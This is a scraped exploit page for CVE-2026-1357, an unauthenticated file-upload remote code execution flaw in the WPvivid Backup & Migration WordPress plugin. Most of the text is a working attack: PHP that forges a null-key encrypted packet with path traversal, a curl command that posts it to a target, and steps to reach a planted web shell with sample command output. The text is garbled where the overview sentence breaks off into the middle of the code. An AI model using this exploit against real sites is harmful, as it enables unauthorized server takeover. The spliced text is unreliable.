Share
## https://sploitus.com/exploit?id=C1C90920-9C4E-5000-A5A1-B5364432B265
# CVE-2026-1357 WPvivid Backup & Migration RCE PoC

**Discovered by:** Lucas Montes (NiRoX)  
**Vulnerability:** Unauthenticated Arbitrary File Upload leading to Remote Code Execution (RCE)  
**CVE ID:** CVE-2026-1357  
**CVSS:** Critical(9.8)  
**Status:** Patched in version **0.9.124**

---

## Overview

This repository contains the analysis and Proof of Concept (PoC) for a critical vulnerability in the **WPvivid Backup & Migration** WordPress plugin (versions setBlockLength(128); 

// 2. VULNERABILITY REPRODUCTION
// The server defaults to a null key when RSA decryption fails (returns false).
// We set our local key to 16 null bytes to match the server's vulnerable state.
$rij->setKey(str_repeat("\0", 16));

// 3. The Payload
$shell_content = '';

// 4. The JSON Object with Path Traversal
// We traverse up to /uploads/ to bypass .htaccess restrictions
$params = [
    "backup_id" => "1",
    "name" => "../uploads/pwn_remote.php", 
    "data" => base64_encode($shell_content),
    "offset" => 0,
    "file_size" => strlen($shell_content),
    "total_size" => strlen($shell_content),
    "index" => 0,
    "md5" => md5($shell_content),
    "type" => "backup",
    "status" => "running"
];

// 5. Encrypt with Null Key
$encrypted = $rij->encrypt(json_encode($params));

// 6. Construct Packet
// "ABC" is the fake RSA key that triggers the 'false' return on the server
$fake_key = "ABC"; 
$payload = str_pad(dechex(strlen($fake_key)), 3, "0", STR_PAD_LEFT) 
         . $fake_key 
         . str_pad(dechex(strlen($encrypted)), 16, "0", STR_PAD_LEFT) 
         . $encrypted;

echo base64_encode($payload);
?>

```

### Executing the Attack

1. **Generate the Payload:**
```bash
PAYLOAD=$(php exploit.php)

```


2. **Send Request:**
```bash
curl -i -s -X POST 'http://TARGET-URL/' \
  -d 'wpvivid_action=send_to_site' \
  --data-urlencode "wpvivid_content=$PAYLOAD"

```


3. **Verify RCE:**
If successful, the shell will be accessible at:
```
http://TARGET-URL/wp-content/uploads/pwn_remote.php?cmd=id

```
**Result:**
```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```